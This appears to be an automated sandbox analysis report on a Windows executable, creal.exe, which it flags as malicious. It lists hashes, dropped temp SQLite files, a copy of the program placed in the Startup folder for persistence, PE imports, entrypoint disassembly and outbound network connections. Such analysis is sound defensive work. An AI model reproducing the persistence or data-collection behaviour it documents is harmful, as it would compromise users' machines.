                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                              Entropy (8bit):1.1371207751183456
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
                                                                                                                                                                                                              MD5:643AC1E34BE0FDE5FA0CD279E476DF3A
                                                                                                                                                                                                              SHA1:241B9EA323D640B82E8085803CBE3F61FEEA458F
                                                                                                                                                                                                              SHA-256:C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
                                                                                                                                                                                                              SHA-512:73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrhqznfios.db

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):0.8467337400211222
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
                                                                                                                                                                                                              MD5:7A03CC0EAD0AEFF210C3E60823AAA5EC
                                                                                                                                                                                                              SHA1:8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
                                                                                                                                                                                                              SHA-256:D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
                                                                                                                                                                                                              SHA-512:8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrqefyfsfs.db

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrrrdgqmdo.db

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                                              Entropy (8bit):1.1371207751183456
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
                                                                                                                                                                                                              MD5:643AC1E34BE0FDE5FA0CD279E476DF3A
                                                                                                                                                                                                              SHA1:241B9EA323D640B82E8085803CBE3F61FEEA458F
                                                                                                                                                                                                              SHA-256:C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
                                                                                                                                                                                                              SHA-512:73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcruqtngrlp.db

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                              Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                              MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                              SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                              SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                              SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcrxosudxqf.db

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                                              Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                              MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                              SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                              SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                              SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Local\Tempcryoqtqfcj.db

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\creal.exe
                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17171619
                                                                                                                                                                                                              Entropy (8bit):7.99668685845339
                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                              SSDEEP:393216:uEkMDn78nxpUTLfhJuW+eGQRCMTozGxu8C0ibfz6e57xeBOxImR07KWHOcpd:uUDn87UTLJ4W+e5RLoztZ026e5VeM2KM
                                                                                                                                                                                                              MD5:DA1695DBA8BD25D00E05E7769D6D7E8E
                                                                                                                                                                                                              SHA1:884C5B84185BFCC06B2F82474642E23AF842CF26
                                                                                                                                                                                                              SHA-256:7166D6CC2435061F32CF982DBA8F6EC27FC23A46C9705AA52FB2BA08EB7011AA
                                                                                                                                                                                                              SHA-512:8D0538DEF7BF8B993F812BDBEDF3AA445637FF66746B1A041B491FBDD0E707356C2331AA56625A5C40D0CE6079CC0E9A30C9A2DE65B002027E37F2CED24C72AF
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d...%-.f.........."....%.....`.................@.............................p......).....`.....................................................x....`....... ..."...........`..X... ..................................@............... ............................text............................... ..`.rdata...-..........................@..@.data...H3..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc........`......................@..@.reloc..X....`......................@..B................................................................................................................................................................................................

                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                              General

                                                                                                                                                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Entropy (8bit):7.99668685845339
                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                              • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                                                                              • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                              File name:creal.exe
                                                                                                                                                                                                              File size:17'171'619 bytes
                                                                                                                                                                                                              MD5:da1695dba8bd25d00e05e7769d6d7e8e
                                                                                                                                                                                                              SHA1:884c5b84185bfcc06b2f82474642e23af842cf26
                                                                                                                                                                                                              SHA256:7166d6cc2435061f32cf982dba8f6ec27fc23a46c9705aa52fb2ba08eb7011aa
                                                                                                                                                                                                              SHA512:8d0538def7bf8b993f812bdbedf3aa445637ff66746b1a041b491fbdd0e707356c2331aa56625a5c40d0ce6079cc0e9a30c9a2de65b002027e37f2ced24c72af
                                                                                                                                                                                                              SSDEEP:393216:uEkMDn78nxpUTLfhJuW+eGQRCMTozGxu8C0ibfz6e57xeBOxImR07KWHOcpd:uUDn87UTLJ4W+e5RLoztZ026e5VeM2KM
                                                                                                                                                                                                              TLSH:6A073346929008B2F6E1D1389516C97BF732B0100754E2BF1775B2292FBB3535E3DBAA
                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?.......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?................

                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                              Icon Hash:4a464cd47461e179

                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Entrypoint:0x14000c2f0
                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                              Time Stamp:0x66F02D25 [Sun Sep 22 14:43:49 2024 UTC]
                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                              OS Version Minor:2
                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                              File Version Minor:2
                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                              Subsystem Version Minor:2
                                                                                                                                                                                                              Import Hash:1af6c885af093afc55142c2f1761dbe8

                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                              call 00007F0AB5446DFCh
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                              jmp 00007F0AB5446A0Fh
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              sub esp, 28h
                                                                                                                                                                                                              call 00007F0AB5447374h
                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                              je 00007F0AB5446BB3h
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              mov eax, dword ptr [00000030h]
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                              jmp 00007F0AB5446B97h
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              cmp ecx, eax
                                                                                                                                                                                                              je 00007F0AB5446BA6h
                                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              cmpxchg dword ptr [0003418Ch], ecx
                                                                                                                                                                                                              jne 00007F0AB5446B80h
                                                                                                                                                                                                              xor al, al
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              add esp, 28h
                                                                                                                                                                                                              ret
                                                                                                                                                                                                              mov al, 01h
                                                                                                                                                                                                              jmp 00007F0AB5446B89h
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              inc eax
                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              sub esp, 20h
                                                                                                                                                                                                              movzx eax, byte ptr [00034177h]
                                                                                                                                                                                                              test ecx, ecx
                                                                                                                                                                                                              mov ebx, 00000001h
                                                                                                                                                                                                              cmove eax, ebx
                                                                                                                                                                                                              mov byte ptr [00034167h], al
                                                                                                                                                                                                              call 00007F0AB5447173h
                                                                                                                                                                                                              call 00007F0AB5448292h
                                                                                                                                                                                                              test al, al
                                                                                                                                                                                                              jne 00007F0AB5446B96h
                                                                                                                                                                                                              xor al, al
                                                                                                                                                                                                              jmp 00007F0AB5446BA6h
                                                                                                                                                                                                              call 00007F0AB5455231h
                                                                                                                                                                                                              test al, al
                                                                                                                                                                                                              jne 00007F0AB5446B9Bh
                                                                                                                                                                                                              xor ecx, ecx
                                                                                                                                                                                                              call 00007F0AB54482A2h
                                                                                                                                                                                                              jmp 00007F0AB5446B7Ch
                                                                                                                                                                                                              mov al, bl
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              add esp, 20h
                                                                                                                                                                                                              pop ebx
                                                                                                                                                                                                              ret
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              inc eax
                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              dec eax
                                                                                                                                                                                                              sub esp, 20h
                                                                                                                                                                                                              cmp byte ptr [0003412Ch], 00000000h
                                                                                                                                                                                                              mov ebx, ecx
                                                                                                                                                                                                              jne 00007F0AB5446BF9h
                                                                                                                                                                                                              cmp ecx, 01h
                                                                                                                                                                                                              jnbe 00007F0AB5446BFCh
                                                                                                                                                                                                              call 00007F0AB54472DAh
                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                              je 00007F0AB5446BBAh

                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x3cee40x78.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000xf41c.rsrc
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x420000x22c8.pdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x560000x758.reloc
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x3a4200x1c.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3a2e00x140.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x420.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                              Sections

                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                              .text0x10000x29d900x29e0015c814a42215e290d8bab54e3db4f28eFalse0.5531133395522388data6.488360740396217IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .rdata0x2b0000x12d0c0x12e00377d3e0f7c95bb22c4f7a316a5b04f1bFalse0.5158319536423841data5.820062241150467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .data0x3e0000x33480xe00e1f21cabb4e5e084c6e11e610d715023False0.13253348214285715Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 01.8227234993173287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                              .pdata0x420000x22c80x2400b142de92a6283807ff34839c180f053cFalse0.4743923611111111data5.326103127679494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              _RDATA0x450000x15c0x200ee29821d11e5dd21c3e807a502fa5813False0.38671875data2.83326547900447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .rsrc0x460000xf41c0xf600c654ab5a3bc06ebf8c554f36c31153c0False0.8030837144308943data7.554967714213712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .reloc0x560000x7580x8007813f7270f60606010808eaa88aee14bFalse0.5439453125data5.24418466384704IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                              Resources

                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                              RT_ICON0x462080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.585820895522388
                                                                                                                                                                                                              RT_ICON0x470b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.7360108303249098
                                                                                                                                                                                                              RT_ICON0x479580x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.755057803468208
                                                                                                                                                                                                              RT_ICON0x47ec00x952cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9975384937676757
                                                                                                                                                                                                              RT_ICON0x513ec0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.3887966804979253
                                                                                                                                                                                                              RT_ICON0x539940x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.49530956848030017
                                                                                                                                                                                                              RT_ICON0x54a3c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.7207446808510638
                                                                                                                                                                                                              RT_GROUP_ICON0x54ea40x68data0.7019230769230769
                                                                                                                                                                                                              RT_MANIFEST0x54f0c0x50dXML 1.0 document, ASCII text0.4694508894044857

                                                                                                                                                                                                              Imports

                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                              USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                              COMCTL32.dll
                                                                                                                                                                                                              KERNEL32.dllIsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                                                                                                              ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                              GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.196223974 CET49763443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.196258068 CET44349763104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.196363926 CET49763443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.197474957 CET49763443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.197484970 CET44349763104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.667808056 CET44349763104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.668560028 CET49763443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.668577909 CET44349763104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.669979095 CET44349763104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.670047045 CET49763443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.671869040 CET49763443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.671938896 CET44349763104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.671988964 CET49763443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.671996117 CET44349763104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.713635921 CET49763443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.813072920 CET44349763104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.813131094 CET44349763104.26.13.205192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.813190937 CET49763443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.813823938 CET49763443192.168.2.9104.26.13.205
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.822525978 CET49769443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.822546959 CET4434976945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.822607994 CET49769443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.823143959 CET49769443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:16.823152065 CET4434976945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.451456070 CET4434976945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.452142000 CET49769443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.452148914 CET4434976945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.453164101 CET4434976945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.453224897 CET49769443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.454515934 CET49769443192.168.2.945.112.123.126
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.454579115 CET4434976945.112.123.126192.168.2.9
                                                                                                                                                                                                              Jan 16, 2025 09:09:17.454823971 CET49769443192.168.2.945.112.123.126
